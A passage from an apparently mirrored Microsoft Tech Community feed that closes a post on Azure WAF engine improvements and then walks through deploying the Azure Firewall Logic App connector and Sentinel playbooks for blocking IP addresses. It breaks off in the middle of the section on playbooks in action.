fixes that help lower the occurrence of false positives, and new security rules have been added to detect and protect against more threats, such as attacks against JAVA applications. For more detailed information on what changed from CRS 3.1 to CRS 3.2, you can refer to the <A href="#" target="_blank" rel="noopener">OWASP ModSecurity Core Rule Set Version 3.2.0 change log</A>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_0-1626892666368.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297464i938EB678DCBC7513/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_0-1626892666368.png" alt="camilamartins_0-1626892666368.png" /></span></P> <P>&nbsp;</P> <P><FONT size="4"><STRONG><FONT color="#333399">Better performance</FONT>&nbsp;</STRONG></FONT></P> <P>The new WAF engine has been designed to allow for more flexibility, reliability, and efficiency. This engine offers improved memory utilization, latency, and throughput – which contributes to overall better performance when using Azure WAF for Application Gateway v2.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P>As an example, we compared the latency rates between the new WAF engine, old WAF engine, and Application Gateway v2 with no WAF enabled. Keep in mind that the examples below are findings from internal test samples, and actual performance improvement rates for customers’ resources may vary.</P> <P>&nbsp;</P> <P>In the sample test below, we verified the amount of latency based on a GET request with different cookie sizes. We can see in the chart below how a request with a cookie size of 4kb with the old WAF engine resulted in a latency of above 100 milliseconds, while the latency for the same cookie size with the new WAF engine is below 50 milliseconds. The performance improvement gets even more significant when comparing to a larger cookie size, as seen with the 16kb cookie.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_1-1626892708699.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297465i212034C48ACB99A7/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_1-1626892708699.png" alt="camilamartins_1-1626892708699.png" /></span></P> <P>&nbsp;</P> <P><SPAN>In another sample test, we measured&nbsp;the amount of&nbsp;latency based on a POST request with different payload sizes. We can see in the chart&nbsp;below&nbsp;that a payload of 128kb in size has an expected latency of just above 500 milliseconds with the new WAF engine, while the same payload size reaches almost 2500 milliseconds of latency with the previous WAF engine.</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_2-1626892721090.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297466i734D5503CB6D0200/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_2-1626892721090.png" alt="camilamartins_2-1626892721090.png" /></span></P> <P><FONT size="4" color="#333399"><STRONG>Increased limits</STRONG></FONT></P> <P>Due to improvements in our new WAF engine in the backend,&nbsp;we now allow customers to increase the limits for <EM>Max Request Body Size</EM> and <EM>Max File Upload Size</EM>. The <STRONG><EM>Max Request Body Size</EM></STRONG> limit was increased <STRONG>from 128KB to 2MB</STRONG>, and the <STRONG><EM>Max File Upload Size</EM></STRONG> limit was increased <STRONG>from 750MB to 4GB.</STRONG></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_3-1626892732228.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297467i19CC04DF45643EC2/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_3-1626892732228.png" alt="camilamartins_3-1626892732228.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 21 Jul 2021 21:25:12 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-improvements-on-azure-waf-for-application-gateway/ba-p/2572257 camilamartins 2021-07-21T21:25:12Z Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224 <P>&nbsp;</P> <P><SPAN>Written in partnership with&nbsp;<LI-USER uid="548441"></LI-USER>&nbsp;</SPAN><SPAN>(Program Manager,&nbsp;</SPAN><SPAN>Azure Sentinel Product Team)</SPAN></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><FONT size="6">Introduction</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">In the <A href="#" target="_blank" rel="noopener">current threat landscape</A>, success of security operations depends on the ability to respond quickly to threats in the environment.&nbsp; A key part of the agility needed to respond to the volume of threats detected by many systems, is automation in both detection and response processes.&nbsp; <SPAN>To implement security monitoring, detection,&nbsp;and response at scale from a networking&nbsp;perspective, in addition to having visibility into the traffic traversing through your network devices&nbsp;and detection logic&nbsp;to&nbsp;identify malicious patterns&nbsp;in the network traffic, you also need automation to surface threats to SOCs/security analysts and allow them to take swift response/remediation actions to mitigate the threats.</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN>Readers of this post will hopefully be familiar with both Azure&nbsp;Firewall&nbsp;which provides protection against&nbsp;network-based&nbsp;threats,&nbsp;and Azure&nbsp;Sentinel&nbsp;which provides&nbsp;SEIM (</SPAN><SPAN>Security Information and Event Management</SPAN><SPAN>) and SOAR (security&nbsp;orchestration,&nbsp;automation, and&nbsp;response)&nbsp;capabilities.&nbsp;&nbsp;In this blog, we will&nbsp;discuss&nbsp;the&nbsp;new </SPAN>Azure Firewall Logic App Connector and Playbook Templates<SPAN> which provide deeper integration for&nbsp;Azure Firewall&nbsp;with&nbsp;Azure Sentinel.&nbsp;&nbsp;With this integration, you can automate response to Azure Sentinel incidents which contains IP addresses (IP entity), in Azure Firewall. &nbsp;The&nbsp;new Connector and Playbook templates allow&nbsp;security teams to&nbsp;get&nbsp;threat detection alerts&nbsp;directly in a Microsoft Teams Channel when one of the Playbooks attached to an Automation Rule triggers based on a Sentinel detection rule.&nbsp; Security&nbsp;incident&nbsp;response&nbsp;teams can&nbsp;then&nbsp;triage, perform&nbsp;one click response and&nbsp;remediation in Azure Firewall to block or allow IP address sources and destinations based on these alerts.</SPAN><SPAN>&nbsp;</SPAN></FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Scenario</FONT></H2> <H2>&nbsp;</H2> <P data-unlink="true"><FONT size="4">In case of an attack or a compromise, a malicious adversary or malware may employ a variety of techniques to discover, infiltrate into and exfiltrate data from a target environment.&nbsp; <SPAN>The traffic representing these malicious activities will flow in and out through the network ingress and egress points where it will be processed and logged, ideally by a&nbsp;firewall&nbsp;controlling internet access.&nbsp; The data logged by firewalls processing internet egress traffic can be analyzed to detect traffic patterns suggesting/representing malicious activity.&nbsp; </SPAN>Azure Sentinel provides many such <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958" target="_blank" rel="noopener">in-built rules to detect malicious traffic patterns through Azure Firewall logs</A><SPAN>.&nbsp; &nbsp;&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4">The new Azure Firewall Connector and Playbooks can be added on to this workflow, whereby the Automation feature in Azure Sentinel can be used to trigger one of the Firewall Playbooks when an incident with an IP entity is created (by an Analytic rule-based detection), to take desired action.&nbsp; When the Azure Sentinel detection rule criteria is met, the attached Playbook is triggered which sends an adaptive notification to a Teams Channel defined in the configuration.&nbsp; The adaptive notification allows the SOC team to triage the notification and either act on the alert by blocking specific IP sources or destinations or to ignore the detection as false positive, as defined in the Playbook.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">What’s New</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">Up until now, customers could create their own Logic App Connector for Azure Firewall and Playbooks.&nbsp; We are excited to announce availability of the <A href="#" target="_blank" rel="noopener">Custom Logic App Connector along with three new Playbooks Templates for Azure Firewall</A> which can be used with Azure Sentinel Automation feature and Analytic Rules to take a variety of desired actions, in case of a detection.&nbsp; The solution package contains four components:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4"><STRONG>Azure Firewall Connector</STRONG>:&nbsp; The connector allows you to take many different actions against Azure Firewall, Firewall Policy, and IP Groups.&nbsp; A full list of actions supported by the connector is available <A href="#" target="_blank" rel="noopener">here</A></FONT></LI> <LI><FONT size="4"><STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG>: &nbsp;This playbook allows you to block IP addresses in Azure Firewall by adding them to <STRONG>IP Groups </STRONG>based on analyst decision. &nbsp;It allows you to make changes on IP Groups, which are attached to firewall rules, instead of making changes directly to the Azure Firewall. &nbsp;The target IP Group could be associated with policy/rules used in one or more firewalls</FONT></LI> <LI><FONT size="4"><STRONG>AzureFirewall-AddIPtoTIAllowList</STRONG>:&nbsp; This playbook allows the SOC to automatically respond to Azure Sentinel incidents which includes a destination IP address, by adding the specific IP to the Threat Intelligence (TI) Allow list in Azure Firewall</FONT></LI> <LI><FONT size="4"><STRONG>AzureFirewall-BlockIP-addNewRule</STRONG>:&nbsp; This playbook allows you to block an IP address by adding a new network rule with the specific IP to an existing Deny Network Rule Collection in Azure Firewall</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="4">All three playbooks add VirusTotal enrichment and send adaptive notification to the specified Teams Channel.&nbsp; Whether you’re using Azure Firewall Standard with Classic Rules, Firewall Manager Standard Policies or Firewall Premium with Firewall manager Premium Policies, the different playbook templates provide coverage for these different configuration scenarios.&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="4">The table below summarizes playbook support for the Firewall Standard and Premium policy types:</FONT></P> <P>&nbsp;</P> <TABLE> <TBODY> <TR> <TD> <P><FONT size="4"><STRONG>Playbook Name</STRONG></FONT></P> </TD> <TD> <P><FONT size="4"><STRONG>Premium Policy</STRONG></FONT></P> </TD> <TD> <P><FONT size="4"><STRONG>Standard Policy</STRONG></FONT></P> </TD> <TD> <P><FONT size="4"><STRONG>Classic Rules</STRONG></FONT></P> </TD> </TR> <TR> <TD> <P><FONT size="4"><STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG></FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> </TR> <TR> <TD> <P><FONT size="4"><STRONG>AzureFirewall-AddIPtoTIAllowList</STRONG></FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> </TR> <TR> <TD> <P><FONT size="4"><STRONG>AzureFirewall-BlockIP-addNewRule</STRONG></FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">No</FONT></P> </TD> <TD class="lia-align-center"> <P><FONT size="4">Yes</FONT></P> </TD> </TR> </TBODY> </TABLE> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">How Azure Firewall Logic App Connector and Playbooks Work</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">The steps below provide an overview of the end-to-end Playbook and Connector workflow:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">A new Azure Sentinel incident is created with an IP entity which triggers one of the three playbooks attached to the Automation Rule</FONT></LI> <LI><FONT size="4">An adaptive card is sent to the SOC Teams channel providing IP address, VirusTotal report, showing list of existing firewalls in the Resource group and depending on the playbook in use, providing an option to add the specific source or destination IP address to an <STRONG>IP Group</STRONG>, <STRONG>TI Allow List</STRONG>, <STRONG>a new rule to be added to an existing Deny Network Rule Collection.&nbsp; </STRONG>The analyst can also choose to either close the incident using one of the classifications provided in the adaptive card, change the incident severity or to completely ignore the incident</FONT> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Teams Adaptive Notification Card.jpg" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286124iB046CC8BFD79EFD7/image-size/medium?v=v2&amp;px=400" role="button" title="Teams Adaptive Notification Card.jpg" alt="Teams Adaptive Notification Card" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Teams Adaptive Notification Card</span></span></P> </LI> <LI><FONT size="4">If the SOC analyst decides to act on the incident by clicking the action button depending on the playbook in use (<STRONG style="font-family: inherit;">Add this IP Address to the IP Group</STRONG><SPAN style="font-family: inherit;">,</SPAN><STRONG style="font-family: inherit;"> Add IP address to threat intel allow list </STRONG><SPAN style="font-family: inherit;">or</SPAN><STRONG style="font-family: inherit;"> Add IP address to Network Rules Collection </STRONG><SPAN style="font-family: inherit;">buttons), the Firewall Connector uses the Service Principal to authenticate against and make changes to the respective targets; IP Group, Threat Intel Allow List, or the Network Rule Collection.&nbsp; Additionally, incident gets updated with endpoint information, summary of the action taken and virus total scan report</SPAN></FONT></LI> <LI><FONT size="4">If ignored, the incident gets updated with endpoint information and summary of the action taken</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="4">All three playbooks work in a similar fashion, the only difference being the action performed by the specific playbook.&nbsp;&nbsp;</FONT><FONT size="4">To learn more about the end to end workflow of each workbook, please visit the Azure Sentinel GitHub repo page for Azure Firewall <A href="#" target="_blank" rel="noopener">here</A>.&nbsp; You can click on the Connector and Playbook links to get more details.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">What Customizations Can be Done</FONT></H2> <P>&nbsp;</P> <P><FONT size="4">You can also customize the playbook templates to your preference.&nbsp; Existing playbook logic can be modified or removed, and new logic can be added to the playbooks to meet your specific requirements.&nbsp; Below are a couple of examples of the customization that can be made:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">You can replace the VirusTotal TI with your own custom TI provider</FONT></LI> <LI><FONT size="4">You can remove the Teams notification steps in the playbook to remove any human decision/intervention and allow a playbook to make changes directly in the Firewall</FONT></LI> </OL> <P>&nbsp;</P> <P><FONT size="4">It is important to note that the playbook templates and examples above are merely a source of reference and inspiration.&nbsp; While you can choose to use the available playbook templates as is, you can also customize them heavily to the extent needed.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">How to Deploy</FONT></H2> <P>&nbsp;</P> <P><FONT size="4">The Azure Firewall Logic App Connector and Playbooks can be deployed directly from the <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repo page</A> by clicking the <A href="#" target="_blank" rel="noopener">Deploy to Azure</A> button.</FONT></P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><STRONG><EM>Notes</EM></STRONG><EM>: </EM></FONT> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4"><EM>The Azure Firewall Logic App Connector and Playbooks are also available in the <STRONG>Azure Firewall Solution for Azure Sentinel</STRONG></EM></FONT></LI> <LI><FONT size="4"><EM>The Azure Firewall Solution for Azure Sentinel is available and can be deployed from the Azure Marketplace (search for “Azure Firewall Solution”) or from the Solution (Preview) gallery in Azure Sentinel</EM></FONT></LI> <LI><FONT size="4"><EM>The Azure Sentinel Solution gallery is currently in preview and available via the Azure Sentinel blade in the left pane under the Configuration node</EM></FONT></LI> </OL> </LI> </UL> <P>&nbsp;</P> <P><FONT size="4">In this post, we will discuss how to deploy from the Azure Sentinel GitHub repo.&nbsp; We will discuss the Azure Firewall Solution for Azure Sentinel in a separate post.</FONT></P> <P>&nbsp;</P> <P><STRONG><FONT size="4">Please review the deployment prerequisites (pre-deployment configuration) and the post-deployment steps below to successfully deploy, configure, and start using the automation.</FONT></STRONG></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><FONT size="5">Deployment Prerequisites</FONT></H2> <H3>&nbsp;</H3> <P><FONT size="4">You must have an existing Azure Firewall Standard or Azure Firewall Premium, Firewall Policy and IP Group deployed in the environment. &nbsp;The following dependencies should be understood, and prerequisites must be completed before you begin deploying the Firewall Connector and Playbooks.&nbsp; You should have the required permissions to make these changes.</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">The Firewall Connector uses an Azure AD application and service principal to authenticate and make changes to the Firewall, Firewall Policy, and IP Group configuration when a Playbook is triggered.&nbsp; To enable this, you must complete the following steps&nbsp;</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Register an application with Azure AD and create a Service Principal using these instructions <A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener">Create an Azure AD app &amp; service principal in the portal</A></FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">You will use this application credential when deploying the Firewall Connector and Playbooks.&nbsp; To retrieve it, go to the<SPAN>&nbsp;<STRONG>Azure Active Directory --&gt;</STRONG>&nbsp;<STRONG>App registrations</STRONG> </SPAN>blade and find the following</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">Tenant Id (Directory ID in Overview blade)</FONT></LI> <LI><FONT size="4">Client ID (Application ID in Overview blade)</FONT></LI> <LI><FONT size="4">Client secret (Client secret Value in Certificates &amp; secrets blade)</FONT><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Get AAD Secret.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286131i981933075D9B00EC/image-size/large?v=v2&amp;px=999" role="button" title="Get AAD Secret.jpg" alt="Get AAD Secret" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Get AAD Secret</span></span></LI> </UL> </LI> </UL> </LI> <LI><FONT size="4">Assign the Azure AD application and service principal “Contributor” permission to the Azure Firewall, Firewall Policy, and IP Groups.&nbsp; Use the IAM panel of these resources to assign the permission</FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">For each Firewall, Firewall Policy, and IP Group resource that you want to be updated when a Playbook is triggered</FONT> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4">Go to Settings à <STRONG>Access control (IAM)</STRONG></FONT></LI> <LI><FONT size="4">Click <STRONG>Add </STRONG>and then click<STRONG> Add role assignment</STRONG></FONT></LI> <LI><FONT size="4">Select <STRONG>Contributor</STRONG> role</FONT></LI> <LI><FONT size="4">Search for the name of your Azure AD application and service principal created in the previous step (1a), select it, and then click <STRONG>Save</STRONG></FONT> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><EM><STRONG>Note</STRONG>:</EM> <EM>By default, Azure AD applications aren't displayed in the available options. To find your application, search for the name and select it</EM></FONT></LI> </UL> </LI> </OL> </LI> </UL> </LI> </OL> </LI> </OL> <P>&nbsp;</P> <OL start="2"> <LI><FONT size="4">When a Playbook is triggered, it first posts an adaptive notification action card to the Teams Channel you specify in the configuration.&nbsp; This allows the SOC analyst to take desired action directly from Teams using the options available in the adaptive card.&nbsp; To enable this, you must complete the following steps</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Create a Team and a Channel in Microsoft Teams (if it does not exist)</FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">Instructions:&nbsp; <A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener">Create a team from scratch - Office Support</A></FONT></LI> </UL> </LI> <LI><FONT size="4">You will need the Teams and Channel id when deploying <SPAN style="font-family: inherit;">Firewall Connector and Playbooks.&nbsp; To o</SPAN><SPAN style="font-family: inherit;">btain Teams id and Channel id, please follow the below instructions</SPAN></FONT> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">Copy the URL of the Teams Channel where you would like to get Playbook notifications</FONT></LI> <LI><FONT size="4">Click on the ellipses next to the Teams Channel and click <STRONG style="font-family: inherit;">Get link to the channel</STRONG></FONT></LI> </UL> </LI> </OL> </LI> </OL> <P class="lia-indent-padding-left-120px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="GetTeamsURL.png" style="width: 166px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286118i2AA0EBF4FB650408/image-size/large?v=v2&amp;px=999" role="button" title="GetTeamsURL.png" alt="Get Teams URL" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Get Teams URL</span></span></P> <OL start="2"> <LI style="list-style-type: none;"> <OL class="lia-list-style-type-lower-alpha"> <LI style="list-style-type: none;"> <UL class="lia-list-style-type-disc"> <LI><FONT size="4">The URL will be in the following format -&nbsp;<EM style="font-family: inherit;"><A href="#" target="_blank" rel="noopener">https://teams.microsoft.com/l/channel/</A></EM><FONT style="font-family: inherit;" color="#FF6600"><EM>10</EM><FONT color="#0000FF"><EM>%3a</EM></FONT><EM>3xxxxx3302eaxxxxx790xxxxxx21xx78</EM><FONT color="#0000FF"><EM>%40</EM></FONT><EM>thread.skype</EM></FONT><EM style="font-family: inherit;">/General?groupId=</EM><FONT style="font-family: inherit;" color="#FF6600"><EM>axxx61xx-2xx8-xx45-a0xx-53xx476xxx0x</EM></FONT><EM style="font-family: inherit;">&amp;tenantId=1xxxx7xx-1xxb-3xx9-xx8b-87xxxxx1xx60</EM></FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">The Teams Group id is in the <STRONG><EM>groupId=</EM></STRONG> parameter in the URL</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">From above example, Teams Group id: axxx61xx-2xx8-xx45-a0xx-53xx476xxx0x</FONT></LI> </UL> </LI> <LI><FONT size="4">The Teams Channel id is in the URI after <EM><STRONG>/channel/</STRONG> </EM>in the URL.&nbsp; You will need to replace the parts marked in blue, in the URL with " : " and " @ " to get a valid Channel id</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4">&nbsp;From above example, Teams Channel id: <FONT color="#FF6600">10<FONT color="#0000FF">:</FONT>3xxxxx3302eaxxxxx790xxxxxx21xx78<FONT color="#0000FF">@</FONT>thread.skype</FONT></FONT> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><EM><STRONG style="font-family: inherit;">Notes</STRONG><SPAN style="font-family: inherit;">:</SPAN></EM></FONT><BR /> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4"><EM>You can also skip the </EM><EM>Teams Group id and Teams Channel id during the initial deployment by adding N/A to the fields and configure them directly in all three playbooks using the drop-down menu after deploying and authorizing the Teams APIs successfully (see post deployment steps for more details on authorizing the APIs)</EM></FONT></LI> <LI><FONT size="4"><EM style="font-family: inherit;">You can also get Teams Channel id using the Microsoft Teams PowerShell module with these instructions </EM><A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener"><EM>Get-TeamChannel</EM></A></FONT></LI> </OL> </LI> </UL> </LI> </UL> </LI> </UL> </LI> </UL> </LI> </OL> </LI> </OL> <P>&nbsp;</P> <OL start="3"> <LI><FONT size="4">The Playbooks leverage VirusTotal service for notification enrichment with IP details and reputation. &nbsp;To use this VirusTotal capabilities, you will need to generate a VirusTotal API key</FONT><FONT size="4">&nbsp;</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Create a VirusTotal API key using this link <A style="font-family: inherit; background-color: #ffffff;" href="#" target="_blank" rel="noopener">how to generate the API Key</A></FONT></LI> <LI><FONT size="4">You will use the API key to authorize the VirusTotal APIs in the post deployment steps below</FONT></LI> </OL> </LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2><FONT size="5">Deploying the Firewall Connector and Playbooks</FONT></H2> <H3>&nbsp;</H3> <P><FONT size="4">After completing the deployment prerequisites, you are now ready to deploy the Firewall Connector and Playbooks.&nbsp; To deploy, please use the following instructions</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">Browse over to the Azure Sentinel GitHub repo page and click the <A href="#" target="_blank" rel="noopener">Deploy to Azure</A> button</FONT></LI> <LI><FONT size="4">In the <STRONG>Custom deployment</STRONG> page, select the Subscription and Resource Group where you want to deploy the components</FONT></LI> <LI><FONT size="4">Add the Teams; Group id and Channel id along with Service Principal; Client id and Client Secret</FONT> <UL class="lia-list-style-type-square"> <LI><FONT size="4"><EM><STRONG>Note</STRONG>: You can also skip the Teams Group id and Teams Channel id during the initial deployment by adding N/A (or some other text) to the fields and configure them directly in all three playbooks using the drop-down menu after deploying and authorizing the Teams APIs successfully (see post deployment steps for more details on authorizing the APIs)</EM></FONT></LI> </UL> </LI> <LI><FONT size="4">Click <STRONG>Review + Create</STRONG> button and then click the <STRONG>Create</STRONG> button on next page to start deployment</FONT></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="SentinelSolutionDeploy_Trimmed.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286126i05F11D8B2C5EDD03/image-size/large?v=v2&amp;px=999" role="button" title="SentinelSolutionDeploy_Trimmed.gif" alt="Deploying Firewall Connector and Playbooks" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Deploying Firewall Connector and Playbooks</span></span></P> <H2>&nbsp;</H2> <H3>&nbsp;</H3> <H2><FONT size="5">Post Deployment Configuration and Validation</FONT></H2> <H3>&nbsp;</H3> <P><FONT size="4">After the deployment of Firewall Connector and Playbooks is complete, you should see a total of sixteen new resources in the target Resource Group.&nbsp; The new resources will include a Logic App Connector for Firewall, three Logic App Playbooks, and twelve API connections (three APIs each for OAuth, VirusTotal, Azure Sentinel, and Teams).&nbsp; Please follow the below steps before the Playbooks can be used.</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">Authorize API Connections:&nbsp; All APIs for the solution must be authorized before the connector and playbooks can be used.&nbsp; Please complete the following steps to authorize the APIs:</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Click an API to open the API Connection settings page</FONT></LI> <LI><FONT size="4">Click the <STRONG>Edit API Connection </STRONG>node in the left pane</FONT></LI> <LI><FONT size="4">Click the Authorize button in the blade, sign-in and <STRONG>Save</STRONG> to authorize the API</FONT></LI> <LI><FONT size="4">Repeat steps a, b &amp; c for all twelve APIs in the same manner, one at a time</FONT> <OL class="lia-list-style-type-lower-roman"> <LI><FONT size="4">For authorizing the three Virus Total APIs, you will need to add API key in the <STRONG>x-api_key</STRONG> and click <STRONG>Save</STRONG></FONT></LI> <LI><FONT size="4">For authorizing the three Teams APIs, you will need to sign-on with the same identity you use to logon to Teams</FONT></LI> </OL> </LI> </OL> </LI> </OL> <P>&nbsp;</P> <OL start="2"> <LI><FONT size="4">Validate/update playbook configuration:&nbsp; Validate or optionally update the playbook configuration to ensure that all components are setup correctly and ready to be used.&nbsp; Please complete the following steps to validate/update configuration of the playbooks:</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Click on one of the playbooks to open Settings</FONT></LI> <LI><FONT size="4">Click on the <STRONG>Logic app designer </STRONG>in the <STRONG>Development tools </STRONG>node</FONT></LI> <LI><FONT size="4">Check to ensure that all steps are showing up without the exclamation icon which indicates an issue with the configuration</FONT></LI> </OL> </LI> </OL> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="PlaybookConnections.png" style="width: 364px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286114i69C92A4BCB9E3C5E/image-size/large?v=v2&amp;px=999" role="button" title="PlaybookConnections.png" alt="Playbook Validation - error" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Playbook Validation - error</span></span></P> <OL start="2"> <LI style="list-style-type: none;"> <OL class="lia-list-style-type-lower-alpha"> <LI> <DIV id="tinyMceEditorMohit_Kumar_3" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <DIV id="tinyMceEditorMohit_Kumar_4" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <FONT size="4">Optionally, if you had skipped adding the Teams Group and Channel ids during initial deployment by adding N/A (or some other text) to the fields, you can configure it now by opening <STRONG style="font-family: inherit;">Teams Connections</STRONG><SPAN style="font-family: inherit;"> under the </SPAN><STRONG style="font-family: inherit;">For each Malicious IP Address Entity present</STRONG><SPAN style="font-family: inherit;"> in the Incident step and then selecting the appropriate Teams Group and Channel using the drop-down selection</SPAN></FONT></LI> </OL> </LI> </OL> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1622749684665.png" style="width: 356px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286109i031B837D0F1FF46E/image-dimensions/356x438?v=v2" width="356" height="438" role="button" title="Mohit_Kumar_2-1622749684665.png" alt="Playbook Validation - Configure Teams Settings" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Playbook Validation - Configure Teams Settings</span></span></P> <P>&nbsp;</P> <OL start="3"> <LI><FONT size="4">Configure playbook permissions:&nbsp; In order to allow Azure Sentinel to run Firewall playbooks based on a detection rule, you must give Azure Sentinel permission to run them.&nbsp; Please complete the following steps to add permissions:</FONT> <OL class="lia-list-style-type-lower-alpha"> <LI><FONT size="4">Open the Azure Sentinel blade and click <STRONG>Automation</STRONG> under the <STRONG>Configuration</STRONG> node</FONT></LI> <LI><FONT size="4">Click on <STRONG>Configure permissions</STRONG> button under <STRONG>Give Sentinel permissions to run playbooks</STRONG></FONT></LI> <LI><FONT size="4">In the <STRONG>Manage permissions</STRONG> blade, search for, and then click to select the resource group which contains the firewall playbooks</FONT></LI> <LI><FONT size="4">After selecting the appropriate resource group, click <STRONG>Apply</STRONG></FONT></LI> </OL> </LI> </OL> <P>&nbsp;</P> <P><FONT size="4">Congratulations!&nbsp; You are now ready to use the Azure Firewall playbooks with Azure Sentinel rules.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Playbooks in Action</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">To see how the playbooks and the connector work together, please use the following instructions:</FONT></P> <P>&nbsp;</P> <OL> <LI><FONT size="4">Open the Azure Sentinel blade and click <STRONG>Analytics 